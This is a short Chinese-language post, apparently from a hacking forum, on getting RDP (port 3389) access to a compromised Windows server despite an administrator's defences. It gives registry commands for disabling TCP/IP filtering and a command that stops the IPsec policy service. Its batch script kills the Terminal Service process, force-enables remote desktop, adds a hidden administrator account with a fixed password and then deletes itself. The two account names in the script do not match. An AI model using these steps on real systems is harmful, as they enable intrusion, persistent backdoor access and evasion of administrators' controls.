浅析5种原因,不是绝对的,如果大家还有遇到其他类型可以反馈一下,丰富文章!


开了3389无法登录的5种原因
1、服务器在内网。

2、做了tcp/ip筛选。
  先执行下面cmd命令:
  cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处

  cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip,导出注册表里关于TCP/IP筛选的第二处

  cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip",导出注册表里关于TCP/IP筛选的第三处

然后回到c盘1.reg,2.reg,3.reg,把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,找到 EnableSecurityFilters这个字段看看dword后面的键值是否为00000000,如果为00000001就说明管理员做了tcp/ip筛选,我们只要把1改成0就行了,2.reg 和3.reg进行一样的修改。


3、做了ip安全策略。
执行cmd命令: cmd /c net stop policyagent 将IPSEC Services服务停了它。再连3389。


4、管理员设置的终端登陆权限只有指定的用户可以。


5、防火墙(也可以属于安防软件类,批处理对系统防火墙有效)
  1. @echo off
  2. mode con: cols=15 lines=1
  3. tasklist /svc >1.txt
  4. FINDSTR /i "TermService" 1.txt >2.txt
  5. FOR /F "tokens=2 delims= " %%1 in (2.txt) do ntsd -c q -p %%1
  6. del 1.txt /q
  7. del 2.txt /q
  8. echo Windows Registry Editor Version 5.00>>3389.reg
  9. echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
  10. echo "fDenyTSConnections"=dword:00000000>>3389.reg
  11. regedit /s 3389.reg
  12. sc config TermService start= demand
  13. sc start TermService
  14. del 3389.reg
  15. shutdown -a
  16. net user administratord$ 112233 /add & net localgroup administrators vincent$ /add
  17. del diy3389.bat /q